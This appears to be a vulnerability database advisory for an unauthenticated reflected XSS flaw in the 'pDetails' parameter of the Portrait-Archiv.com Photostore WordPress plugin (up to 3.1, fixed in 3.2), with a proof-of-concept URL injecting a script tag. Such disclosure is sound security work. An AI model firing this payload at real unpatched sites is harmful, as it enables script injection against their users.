Portrait-Archiv.com Photostore <= 3.1 - Unauthenticated Reflected XSS



Description
The 'pDetails' GET parameter from the js/imageDetails.php was vulnerable to an unauthenticated reflected XSS attack.
Proof of Concept
http://www.example.com/wp-content/plugins/portrait-archiv-shop/js/imageDetails.php?pDetails=);});</script><script>alert("XSS")</script>

Affects Plugin

fixed in version 3.2

References

PacketStorm 154343
URL https://plugins.trac.wordpress.org/changeset/2156762/portrait-archiv-shop

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Ricardo Sanchez
Views 4312
Verified Yes
WPVDB ID 9859

Timeline

Publicly Published 2019-09-03 (10 months ago)
Added 2019-09-04 (10 months ago)
Last Updated 2020-02-13 (5 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin